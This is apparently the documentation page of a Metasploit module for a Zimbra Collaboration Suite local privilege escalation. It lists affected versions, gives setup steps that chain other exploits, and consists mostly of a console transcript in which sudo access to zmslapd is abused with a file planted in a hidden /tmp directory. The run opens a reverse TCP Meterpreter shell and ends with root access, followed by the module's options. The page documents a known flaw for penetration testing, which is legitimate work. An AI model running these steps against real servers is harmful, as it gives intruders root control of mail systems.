Ron Bowes
2.0 KiB
2.0 KiB
Vulnerable Application
The following versions of Zimbra are vulnerable:
- Zimbra Collaboration Suite 9.0.0 Patch 26 and earlier
- Zimbra Collaboration Suite 8.8.15 Patch 33 and earlier
Verification Steps
Install Zimbra on any supported Linux version and get a session as the zimbra
user. The easiest way to exploit zimbra is to rm $(which pax), reboot, and
use CVE-2022-41352. Or generate a Meterpreter payload with msfvenom and run
it.
From there:
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
10 meterpreter x86/linux zimbra @ zimbra.example.org 10.0.0.146:4444 -> 10.0.0.154:39800 (10.0.0.154)
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > use exploit/linux/local/zimbra_slapper_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 10
SESSION => 10
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit
[*] Started reverse TCP handler on 10.0.0.146:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Executing: sudo -n -l
[+] The target is vulnerable.
[*] Creating exploit directory: /tmp/.5kq9XO
[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.5kq9XO/.1wNk1h3
[*] Sending stage (3020772 bytes) to 10.0.0.154
[+] Deleted /tmp/.5kq9XO
[*] Meterpreter session 13 opened (10.0.0.146:4444 -> 10.0.0.154:40044) at 2022-07-21 14:04:12 -0700
meterpreter > getuid
Server username: root
Options
SUDO_PATH
The path to sudo on the host. If we have a proper environment with $PATH set, which we generally do, simply sudo is fine.
ZIMBRA_BASE
The base where Zimbra is installed. Zimbra typically installs to /opt/zimbra, and I'm not even sure if it can install elsewhere, so this default should be fine.